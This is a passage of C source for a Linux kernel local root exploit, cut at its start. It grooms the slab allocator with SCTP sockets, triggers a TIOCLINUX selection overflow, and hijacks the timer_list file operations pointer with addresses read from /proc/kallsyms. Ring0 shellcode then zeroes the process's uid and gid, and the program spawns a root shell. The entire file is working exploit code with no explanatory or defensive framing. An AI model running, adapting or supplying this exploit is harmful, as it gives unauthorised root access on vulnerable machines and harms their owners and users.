"\x5f"                                      //    pop    %rdi
"\xc3";                                     //    retq

/* conn struct */
static __u16 srvport;
struct sockaddr_in server_s;
static struct sockaddr_in caddr;

/* some fds.. */
static int g_array[10];
static int fd_zmap_srv=-1;
static int kmalloc_fd=-1;
static int unsafe_fd[4] = {-1,-1,-1,-1};

/* misc */
static int dorec = 0, cankill=1, highpage=0;
static char cstack[STACK_SIZE*2];
static __u16 zstream=STREAM_ZERO;
static __u32 uid,gid;
static __u64 fops;
static pid_t child=0;
static char symbuf[20000];

static void __free_stuff()
{
  int i;
  for(i=3; i<2048; i++)
  {
    if((unsafe_fd[0] == i || unsafe_fd[1] == i ||
       unsafe_fd[2] == i || unsafe_fd[3] == i))
        continue;

    close(i);
  }
}

static void bindcpu()
{
  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(0, &set);
  if(sched_setaffinity(0, sizeof(cpu_set_t), &set) < 0)
    __fatal_errno("setaffinity");
}

/* parse functions are not bof-free:) */
static __u64 get_fops_addr()
{
  FILE* stream;
  char fbuf[256];
  char addr[32];
  stream = fopen("/proc/kallsyms", "r");
  if(stream < 0)
    __fatal_errno("open: kallsyms");

  memset(fbuf, 0x00, sizeof(fbuf));
  while(fgets(fbuf, 256, stream) > 0)
  {
    char *p = fbuf;
    char *a = addr;
    memset(addr, 0x00, sizeof(addr));
    fbuf[strlen(fbuf)-1] = 0;
    while(*p != ' ')
      *a++ = *p++; 
    p += 3;
    if(!strcmp(p, TIMER_LIST_FOPS))
      return strtoul(addr, NULL, 16);
  }

  return 0;
}

static int get_total_object(int fd)
{
  char name[32];
  char used[32];
  char total[32];
  char *ptr[] = {name, used, total};
  int ret,i,toread=sizeof(symbuf)-1;
  char *p = symbuf;

  lseek(fd, 0, SEEK_SET);
  memset(symbuf, 0x00, sizeof(symbuf));
  while( (ret = read(fd, p, toread)) > 0)
  {
    p += ret;
    toread -= ret;
  }

  p = symbuf;
  do
  {
    for(i=0; i<sizeof(ptr)/sizeof(void*); i++)
    {
      char *d = ptr[i];
      while(*p != ' ')
        *d++ = *p++;  
      *d = 0;
      while(*p == ' ')
        p++;
    }
    while(*p++ != '\n');
    if(!strcmp(KMALLOC, name))
      return atoi(total); 

  } while(*p != 0);
  return 0;
}

static void ring0c(void* t)
{
  int i;
  __u32 *p = t;
  for(i=0; i<1100; i++,p++)
  {
      if(p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&
         p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid)
         {
           p[0] = p[1] = p[2] = p[3] = 0;
           p[4] = p[5] = p[6] = p[7] = 0;
           /* dont care about caps */
           break;
         }
  }
}

static int get_kmalloc_fd()
{
  int fd;
  fd = open("/proc/slabinfo", O_RDONLY);
  if(fd < 0)
    __fatal_errno("open: slabinfo");
  return fd;
}

static int write_sctp(int fd, struct sockaddr_in *s, int channel)
{
  int ret;
  ret = sctp_sendmsg(fd, "a", 1,
               (struct sockaddr *)s, sizeof(struct sockaddr_in),
               0, 0, channel, 0 ,0);
  return ret;
}

static void set_sctp_sock_opt(int fd, __u16 in, __u16 out)
{
  struct sctp_initmsg msg;
  int val=1;
  socklen_t len_sctp = sizeof(struct sctp_initmsg);
  getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);
  msg.sinit_num_ostreams=out;
  msg.sinit_max_instreams=in;
  setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);
  setsockopt(fd, SOL_SCTP, SCTP_NODELAY, (char*)&val, sizeof(val));
}

static int create_and_init(void)
{
  int fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
  if(fd < 0)
    __fatal_errno("socket: sctp");
  set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);
  return fd;
}

static void connect_peer(int fd, struct sockaddr_in *s)
{
  int ret;
  ret = connect(fd, (struct sockaddr *)s, sizeof(struct sockaddr_in));
  if(ret < 0)
    __fatal_errno("connect: one peer");
}

static void conn_and_write(int fd, struct sockaddr_in *s, __u16 stream)
{
  connect_peer(fd,s);
  write_sctp(fd, s, stream);
}

static int clone_thread(void*useless)
{
  int o = 1;
  int c=0,idx=0;
  int fd, ret;
  struct sockaddr_in tmp;
  socklen_t len;

  bindcpu();
  server_s.sin_family = PF_INET;
  server_s.sin_port = htons(srvport);
  server_s.sin_addr.s_addr = inet_addr(LOCALHOST);

  fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
  if(fd < 0)
    return -1;

  set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);  
  setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));

  ret = bind(fd, (struct sockaddr *)&server_s, sizeof(struct sockaddr_in));
  if(ret < 0)
    return -1;

  ret = listen(fd, 100);
  if(ret < 0)
    return -1;

  len = sizeof(struct sockaddr_in);
  while((ret = accept(fd, (struct sockaddr *)&tmp, &len)) >= 0)
  {
    if(dorec != 0 && c >= dorec && idx < 10)
    {
      g_array[idx] = ret;
      if(idx==9)
      {
        fd_zmap_srv = ret;
        caddr = tmp;
        break;
      }
      idx++;
    }
    c++;  
    write_sctp(ret, &tmp, zstream);
  }
  sleep(1);
  return 0;
}

static int do_mmap(unsigned long base, int npages)
{
  void*addr = mmap((void*)base, PAGE_SIZE*npages,
                   PROT_READ|PROT_WRITE|PROT_EXEC, 
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);

  if(MAP_FAILED == addr)
    return -1;

  memset(addr, 0x00, PAGE_SIZE*npages);
  return 0;
}

pid_t start_listener()
{
  pid_t pid;
  pid = clone(clone_thread, cstack+STACK_SIZE-8,
              CLONE_VM|CLONE_FILES|SIGCHLD, NULL);
  return pid;
}

static void do_socks(struct sockaddr_in *s, __u16 stream)
{
  int i,fd;
  int n_objs = get_total_object(kmalloc_fd), tmp_n_objs;
  int next=8;

  for(i=0; next != 0; i++)
  {
    fd = create_and_init();

    tmp_n_objs = get_total_object(kmalloc_fd);
    if(!dorec && tmp_n_objs != n_objs)
      dorec=i;

    conn_and_write(fd, s, stream);
    if(dorec)
      next--;
  }
}

static void clr(int fd)
{
  /* use termcap instead..*/
  write(fd, "\33[H\33[J", 6); 
}

static char tiobuffer[2048];
void alloc_tioclinux()
{
  int i;
  char out[128*3];
  /* Unicode Character 'BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL' (U+253C) */
  char utf8[3] = { 0xE2, 0x94, 0xBC }; 
  //char utf8[3] = { 0xE2, 0x80, 0xBC }; 
  struct tiocl_selection *sel;
  char *t;
  void *v = malloc(sizeof(struct tiocl_selection) + 1);
  t = (char*)v;
  sel = (struct tiocl_selection *)(t+1);
  memset(out, 0x41, sizeof(out));
  for(i=0; i<128; i++)
  {
    tiobuffer[(i*3)]=utf8[0];
    tiobuffer[(i*3)+1]=utf8[1];
    tiobuffer[(i*3)+2]=utf8[2];
  }

  *t = TIOCL_SETSEL;
  sel->xs = 1;
  sel->ys = 1;
  sel->xe = 43;
  //sel->xe = 42; /* no overflow */
  sel->ye = 1;
  write(1, tiobuffer, sizeof(tiobuffer));
  if(ioctl(1, TIOCLINUX, v) < 0)
    __fatal("[!!] Unable to call TIOCLINUX ioctl(), need stdout to be on a virtual console\n");
}

static void migrate_evil_fd()
{
  int i;
  pid_t child;

  __msg("[**] Migrate evil unsafe fds to child process..\n");
  child = fork();
  if(!child)
  {

    /* preserve evil fds */
    setsid();
    if(!cankill) /* cant die .. */
      while(1)
        sleep(1);
    else
    {
      sleep(10); /* wait execve() before */
      for(i=0; i<4; i++)
        close(unsafe_fd[i]);

      exit(1);
    }
  }
  else
  {
    if(!cankill)
      __msg_f("[**] Child process %d _MUST_ NOT die ... keep it alive:)\n", child);
  }
}

static void trigger_fault()
{
  char *argv[]={"/bin/sh", NULL};
  int fd,i;

  fd = open("/proc/timer_list", O_RDONLY);
  if(fd >= 0)
  {
    ioctl(fd, 0, 0);
    __free_stuff();
    migrate_evil_fd();
    for(i=0; i<4; i++)
      close(unsafe_fd[i]);

    if(!getuid())
    {
      __msg("[**] Got root!\n");
      execve("/bin/sh", argv, NULL);
    }
  }
  else
  {
    __msg("[**] Cannot open /proc/timer_list");
    __free_stuff();
  }
}

static void overwrite_fops( int sender,
                            struct sockaddr_in *to_receiver,
                            int receiver)
{
  char *p = NULL;
  if(!highpage)
    p++;
  else
    p = (void*)STRUCT_PAGE_ALT;

  __u64 *uip = (__u64*)p; 
  *uip = fops;
  write_sctp(sender, to_receiver, 1); 
  sleep(1);
  trigger_fault();
}

static __u16 get_port()
{
  __u16 r = (__u16)getpid();
  if(r <= 0x400)
    r+=0x400;
  return r;
}

int main(int argc, char *argv[])
{
  int peerx, peery,i;
  __u64 *patch;

  srvport = get_port();

  uid=getuid();
  gid=getgid();
  fops=get_fops_addr() + 64;
  if(!fops)
  {
    __msg("[!!] Unable to locate symbols...\n");
    return 1;
  }

  __msg_f("[**] Patching ring0 shellcode with userspace addr: %p\n", ring0c);
  patch = (__u64*)(ring0 + CJUMP_OFF);
  *patch = (__u64)ring0c;

  __msg_f("[**] Using port: %d\n", srvport);
  __msg("[**] Getting slab info...\n");
  kmalloc_fd = get_kmalloc_fd();
  if(!get_total_object(kmalloc_fd))
    __fatal("[!!] Only SLUB allocator supported\n");

  __msg("[**] Mapping Segments...\n");
  __msg("[**] Trying mapping safe page...");
  if(do_mmap(STRUCT_PAGE, 1) < 0)
  {
    __msg("Page Protection Present (Unable to Map Safe Page)\n");
    __msg("[**] Mapping High Address Page (dont kill placeholder child)\n");
    if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)
      __fatal_errno("mmap");

    cankill=0;  /* dont kill child owning unsafe fds.. */
    highpage=1; /* ssnmap in higher pages */
    zstream=STREAM_ZERO_ALT;
  }
  else
    __msg("Done\n");

  __msg("[**] Mapping Code Page... ");
  if(do_mmap(CODE_PAGE, 1) < 0)
    __fatal_errno("mmap");
  else
    __msg("Done\n");

  memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));

  __msg("[**] Binding on CPU 0\n");
  bindcpu();

  __msg("[**] Start Server Thread..\n");
  child = start_listener();
  sleep(3);
  do_socks(&server_s, zstream);
  for(i=0; i<7; i++)
  {
    close(g_array[8-1-i]); 
  }
  clr(1);
  alloc_tioclinux(); // trigger overflow
  peerx = create_and_init();
  connect_peer(peerx, &server_s);
  peery = create_and_init();
  connect_peer(peery, &server_s);
  sleep(1);

  unsafe_fd[0] = peerx;
  unsafe_fd[1] = g_array[8];
  unsafe_fd[2] = peery;
  unsafe_fd[3] = g_array[9];
  __msg("\n");
  __msg_f("[**] Unmapped end-to-end fd: %d\n", fd_zmap_srv);
  __msg_f("[**] Unsafe  fd: ( ");

  for(i=0; i<4; i++)
    __msg_f("%d ", unsafe_fd[i]);
  __msg(")\n");

  __msg("[**] Hijacking fops...\n");
  overwrite_fops(fd_zmap_srv, &caddr, peery);

  /* if u get here.. something nasty happens...may crash..*/
  __free_stuff();
  __msg("[**] Exploit failed.. freezing process\n");
  kill(getpid(), SIGSTOP);
  return 0;
}

#endif
